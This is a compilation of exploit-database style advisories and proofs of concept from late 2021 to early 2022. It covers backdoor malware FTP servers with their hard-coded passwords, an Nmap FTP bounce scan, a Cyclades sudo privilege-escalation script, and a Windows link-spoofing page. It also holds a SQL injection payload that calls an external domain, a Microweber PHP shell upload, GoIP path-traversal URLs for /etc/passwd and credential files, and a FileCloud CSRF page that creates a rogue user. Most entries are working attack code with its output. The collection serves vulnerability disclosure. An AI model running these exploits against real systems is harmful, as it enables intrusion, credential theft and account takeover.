<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/1d12f9b921b38d7b521f12442bdd52d8_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Simpel.12<br />Vulnerability: Insecure Crypto<br />Description: The malware listens on TCP port 22, authentication is required to access the server. However, the password hash "!supernova" is stored within the executable using an insecure MD5 hash algorithm and no salt. MD5 is a basic purpose fast hash (not slow) and not using salt allows attackers that gain access to the hash ability to conduct faster cracking attacks using pre-computed dictionaries. Finally, the password is easily recovered as it is a known password hash which can be found online. Third-party intruders who successfully gain access then may be able to upload executables which may result in remote code execution.<br /><br />E.g.<br /><br />Name=cRaCkeN<br />Pass=E13820BEDF2B31E01B2C7E59404B1FB7 = !supernova<br /><br />Type: PE32<br />MD5: 1d12f9b921b38d7b521f12442bdd52d8<br />Vuln ID: MVID-2021-0433<br />Disclosure: 12/27/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 22<br /><br />USER cRaCkeN <br />331 Password required for cRaCkeN. <br />PASS !supernova <br />230- [LOGIN] <br />230- [SYSTEM] <br />230- <br />230- Aktiv seit : 1 d, 7 h, 41 min, 57 sec <br />230- <br />230- [SERVER] <br />230- <br />230- Server ist aktiv seit : 28 min, 44 sec <br />230- Server ist aktiv als : Victim <br />230- Traffic (Up/Down) : 0.00/0.00 MB <br />230- Geschw. (Up/Down) : 0/0 KB/sec. <br />230- Bester Speed (Up/Down): 0/0 KB/sec. <br />230- Durchschnitsspeed : 0 KB/sec. genutzt. ││ <br />230- ││ SpaceFree : 26197.29 MB ││ <br />230- ││ Benutzer derzeit : 1 von Max. 100 ││ <br />230- ││ ││<br />230- │├──────────────────────────────[USER]───────────────────────────────┤│ <br />230- ││ ││ <br />230- ││ Willkommen : cRaCkeN <br />230- Sie sind User : 0 von max. 0 mit ihrem Account <br />230- Ratio : 1:-1 (Credits: 15 MB) <br />230- Ihre IP ist : 192.168.18.130 <br />230- <br />230- <br />230- <br />230 User cRaCkeN logged in.<br />SYST <br />215 215 UNIX Type: L8<br />MKD HATE <br />257 Directory created<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation<br /># Date: 09 Feb 2022<br /># Exploit Author: @ibby<br /># Vendor Homepage: https://www.vertiv.com/en-us/<br /># Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip<br /># Version: Legacy Versions V_1.0.0 to V_3.3.0-16<br /># Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)<br /># CVE : N/A<br /><br /># The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges<br />## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014.<br />### This vulnerability does not exist in the newer distributions of the ACS Software.<br /><br />#!/bin/bash<br /><br />## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system.<br />## The software is publicly available, this will grab it and unpack the firmware for you.<br /><br />#TMPDIR=$(mktemp -d)<br />#curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin<br />#sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers"<br />#echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky."<br /><br /><br /># ! EXPLOIT CODE BELOW ! #<br /># -------<br /># Once you exit the root shell, this will clean up and put the binaries back where they belong.<br />echo "Creating backups of sed & bash binaries"<br />sudo cp /bin/sed /bin/sed.bak<br />sudo cp /bin/bash /bin/bash.bak<br />echo "Saved as bash.bak & sed.bak"<br />sudo mv /bin/bash /bin/sed<br />sudo /bin/sed<br />echo "Replacing our binary with the proper one"<br />sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed<br /><br /></code></pre>
<pre><code># Exploit Title: Windows Explorer Preview Pane HTML File Link Spoofing Vulnerability<br /># Google Dork: n/a<br /># Date: December 25th, 2021<br /># Exploit Author: Eduardo Braun Prado<br /># Vendor Homepage: http://www.microsoft.com/<br /># Software Link: http://www.microsoft.com/<br /># Version: Windows 7, 8.1, 10, 11 (x86/x64 )<br /># Tested on: Windows 7, 8.1, 10, 11 (x86/x64)<br /># CVE : n/a<br /><br />Windows Explorer Preview Pane feature allows for spoofing of links contained in an HTML based file because upon moving the mouse over the link nothing happens and it cannot be right-clicked to show the actual target.<br />The app invoked to parse the HTML file in Preview Pane is "prevhost.exe" and it uses MSHTML platform.<br /><br />PoC:<br /><br />==============PreviewMe.htm=========================<br /><!DOCTYPE html><br /><html><body><br /><p><b> Click the link to your favorite search engine!</b></p><br /> <p> <a href="http://www.bing.com/">http://www.google.com/</a></p><br /></body></html><br />=====================================================<br /><br />vídeo demo: https://www.youtube.com/watch?v=A6yhlpRVoV4<br /><br /><br /></code></pre>
<pre><code>## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.20.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http://stupid_asshole.com\\foh'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker from outside can take control of all accounts of this<br />system by using this vulnerability!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=view_estate&id=2'+(select<br />load_file('\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html\\foh'))+''<br />AND (SELECT 2183 FROM (SELECT(SLEEP(3)))uXKK) AND 'NnWW'='NnWW<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Simple-Real-Estate-Portal-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/lffled)<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/1d12f9b921b38d7b521f12442bdd52d8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Simpel.12<br />Vulnerability: Port Bounce Scan<br />Description: The malware listens on TCP port 22. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.<br />Type: PE32<br />MD5: 1d12f9b921b38d7b521f12442bdd52d8<br />Vuln ID: MVID-2021-0432<br />Disclosure: 12/27/2021<br /><br />Exploit/PoC:<br />nmap -n -Pn -b cRaCkeN:!supernova@192.168.18.129:22 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-26 21:42 Pacific Standard Time<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://cRaCkeN:!supernova@192.168.18.129:22<br />Connected:220 SSH-1.99-OpenSSH_3.6.1p1.<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 21:43<br />Removed 22<br />Changed my mind about port 22<br />Removed 21<br />Changed my mind about port 21<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 21:43, 2.39s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: NA<br /># Date: 02/17/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://microweber.org/<br /># Software Link: https://github.com/microweber/microweber<br /># Version: 1.2.11<br /># Tested on: [KALI OS]<br /># CVE : CVE-2022-0557<br /># Reference : https://huntr.dev/bounties/660c89af-2de5-41bc-aada-9e4e78142db8/<br /><br /># Step To Reproduce<br />- Login using Admin Creds. <br />- Navigate to User Section then Add/Modify Users<br />- Change/Add image of profile and Select a Crafted Image file <br />- Crafted image file Aka A image file which craft with PHP CODES for execution <br />- File Extension of Crafted File is PHP7 like "Sample.php7"<br /><br />- Path of Uploaded Crafted SHELL https://localhost/userfiles/media/default/shell.php7<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/f9dc0a462ada737f36efafac56f22b97.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Visiotrol.10<br />Vulnerability: Insecure Password Storage<br />Description: The malware listens by default on TCP port 4567. The default password "vc" is very weak and stored in a plaintext file named "config.vcs" on disk.<br />Type: PE32<br />MD5: f9dc0a462ada737f36efafac56f22b97<br />Vuln ID: MVID-2021-0431<br />Disclosure: 12/25/2021<br /><br />Exploit/PoC:<br />c:\>type config.vcs<br />vc##4567##OFF##OFF##OFF##<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Dbltek GoIP - Local File Inclusion<br /># Date: 20.02.2022<br /># Exploit Author: Valtteri Lehtinen & Lassi Korhonen<br /># Vendor Homepage: http://en.dbltek.com/index.html<br /># Software Link: -<br /># Version: GHSFVT-1.1-67-5 (firmware version)<br /># Tested on: Target is an IoT device<br /><br /># Exploit summary<br />Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP.<br />The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities.<br /><br />Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.<br /><br />It is probable that also other models and versions of Dbltek GoIP devices are affected.<br /><br />Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/<br /><br /># Proof of Concept<br />Assuming the device is available on IP 192.168.9.1.<br /><br />Download /etc/passwd<br />http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd<br />http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd<br /><br />Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up)<br />http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat<br />http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a7ce38e60cf08f2b234f34043b87e701_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.SilentSpy.10<br />Vulnerability: Authentication Race Condition<br />Description: The malware runs an FTP server on TCP port 21. Third-party attackers who can reach the system before a password has been set can logon using default credentials of admin/admin. The default credentials are displayed in the FTP banner upon connecting.<br />Type: PE32<br />MD5: a7ce38e60cf08f2b234f34043b87e701<br />Vuln ID: MVID-2021-0441<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 21<br />220-+-----------------------+<br />220-| º∩LΘn7 ºpy FTP server |<br />220-+-----------------------+-------------------------------------------------+<br />220-| To use the FTP server type, |<br />220-| USER admin |<br />220-| PASS [servers password] |<br />220-| IF the server doesn't have a password then the password is also 'admin' |<br />220-| Have fun [type HELP for more commands] |<br />220 +-------------------------------------------------------------------------+<br />USER admin<br />331 and the password for admin is .. ??<br />PASS admin<br />230 Welcome<br />SYST<br />215 IBM-PC (Windows95/98/NT based system)<br />HELP<br />214-The following commands are recognized:<br /> ABOR DELE NOOP REIN SITE SYST XRMD<br /> ACCT HELP PASS REST SMNT TYPE SIZE<br /> ALLO LIST PASV RETR STAT USER<br /> APPE MKD PORT RMD STOR XCWD<br /> CDUP MODE PWD RNFR STOU XMKD<br /> CWD NLST QUIT RNTO STRU XPWD<br />214 Send comments to drtinus@yahoo.com<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)<br /># Date: 2022-02-20<br /># Exploit Author: Masashi Fujiwara<br /># Vendor Homepage: https://www.filecloud.com/<br /># Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2<br /># Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)<br /># Tested on:<br /># OS: Ubuntu 18.04.6 LTS (Docker)<br /># Apache: 2.4.52<br /># FileCloud: 21.2.4.17315<br /># CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)<br /><br /># Conditions<br />1. Only vulnerable if cookies have samesite set to None (SameSite=None).<br /> echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php<br />2. Use https as target url (When cookies set SameSite=None, also set Secure).<br /><br /># PoC (HTML)<br /><html><br /><head><br /><meta http-equiv="Pragma" content="no-cache"><br /><meta http-equiv="Cache-Control" content="no-cache"><br /><br /><script><br />function init(){<br /> myFormData = new FormData();<br /> let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});<br /> myFormData.append("uploadFormElement", fileContent, "user.csv");<br /> fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});<br />}<br /></script><br /></head><br /><body onload="init()"><br />CSRF PoC for CVE-2022-25241<br /><br />Creat hacker user with Password1 via CSV file upload.<br /></body><br /></html><br /><br /><br /><br /># HTTPS Request<br />POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1<br />Host: 192.168.159.129:8443<br />Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493<br />Content-Length: 365<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br />Connection: close<br /><br />------WebKitFormBoundaryiAXsUsJ2ZV54DFuW<br />Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"<br />Content-Type: application/vnd.ms-excel<br /><br />UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br />hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES<br /><br />------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--<br /><br /><br /><br /># CSV file format<br />UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified<br />hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES<br /><br /><br /></code></pre>